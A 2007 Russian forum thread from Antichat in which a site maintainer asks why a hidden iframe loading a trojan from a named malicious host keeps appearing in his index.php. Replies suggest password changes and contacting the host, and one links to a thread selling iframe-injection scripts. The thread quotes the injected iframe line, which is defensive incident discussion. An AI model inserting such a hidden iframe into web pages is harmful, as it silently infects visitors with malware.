Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.01.2007, 11:13
|
|
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516
Репутация:
0
|
|
Взлом сайта, причины
Я здесь новичок, поэтому прошу сразу не пинать меня.
Где-то с месяц назад, на одном из сайтов, кот. я поддерживаю обнаружил в index.php строку
Код:
<!--iframe width="0" height="0" src="http://eburgertry.info/st/sp/sp.php"></iframe-->
акуратно по ссылке троян
Поняв что сайт был взломан, я из бекапа восстановил индексный файл. Проблема повторялась подря 3 дня. Не понимал, где дырка (индексу не передавались никакие параметры, был тока вывод данных из mySQL). Потом проблема исчезла, причем никаких изменений я в скрипт не вносил.
Сегодня рыскал в инете и случайно наткнулся на сайт:
http://www.sadkamney.ru/
где походу та же проблема.
Подскажите плиз, знающие люди, где косяк. Каким образом вообще в index.php можно вставить тег. Дайте линки, где об этом почитать можно.
Еще раз просьба сильно не пинать 
зы Да у меня лично register_global=off и разрешения на файлы(в том числе на index.php) стоит 644 |
|
|
19.01.2007, 11:40
|
|
Участник форума
Регистрация: 07.01.2007
Сообщений: 259
Провел на форуме:
309455
Репутация:
41
|
|
При доступе к файлам конечно, ты поди сам уже протроянен, на одном из моих сайтов было так-же когда меня протроянили...
Да, и не забудь сменить пароли к сайту, FTP, cpanel, etc... |
|
|
|
19.01.2007, 12:00
|
|
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516
Репутация:
0
|
|
Сообщение от Raz0r
При доступе к файлам конечно, ты поди сам уже протроянен, на одном из моих сайтов было так-же когда меня протроянили...
Да, и не забудь сменить пароли к сайту, FTP, cpanel, etc... Спасибо. А как правильно выставить досту к файлам? И вообще где можно прочитать про такого рода взлом сайта.
зы да троянец я этот словил на лок. машину, он заменяет IE
|
|
|
|
19.01.2007, 12:49
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
Сообщение от Generic54
Спасибо. А как правильно выставить досту к файлам? И вообще где можно прочитать про такого рода взлом сайта.
зы да троянец я этот словил на лок. машину, он заменяет IE вот смотри, что тут продают _http://forum.antichat.ru/thread24250-iframe.html, возможно тебя никто не ломал и не троянил, получили рута на серваке и с помощью скрипта вставили iframe на все сайты хостинга.
|
|
|
|
19.01.2007, 13:04
|
|
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516
Репутация:
0
|
|
Сообщение от злюка
вот смотри, что тут продают _http://forum.antichat.ru/thread24250-iframe.html, возможно тебя никто не ломал и не троянил, получили рута на серваке и с помощью скрипта вставили iframe на все сайты хостинга.
Походу это именно оно...
Если я правильно понял работу скрипта, мне достаточно, поставить атрибуты на все файлы(в том числе и индекс) 444, то есть read, и проблема решена? Или нет?
Доступ на сайт только по ftp естественно по правам рута. Никаких скриптов с записью в индекс и в другие файлы нет.
То есть права рута, насколько я понимаю, тока у юзера, который ходит по ftp. Поставив атрибуты на файлы 444 и поменяв пароль на фтп, проблема должна исчезнуть?
|
|
|
|
19.01.2007, 13:29
|
|
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516
Репутация:
0
|
|
Никто не вкурсе как от этого защититься?
|
|
|
|
19.01.2007, 13:36
|
|
Участник форума
Регистрация: 07.01.2007
Сообщений: 259
Провел на форуме:
309455
Репутация:
41
|
|
Generic54, если имеют права рута, то хоть 0 ставь - не поможет...
|
|
|
|
19.01.2007, 13:38
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
поэтому пиши письмо хостёру..пущай смотрит логи..может чего там и увидит левого.
|
|
|
|
19.01.2007, 13:40
|
|
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516
Репутация:
0
|
|
Сообщение от злюка
поэтому пиши письмо хостёру..пущай смотрит логи..может чего там и увидит левого.
ОК, спасибо всем. Будем смотреть
|
|
|
|
19.01.2007, 14:58
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Ифрейм трафик...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
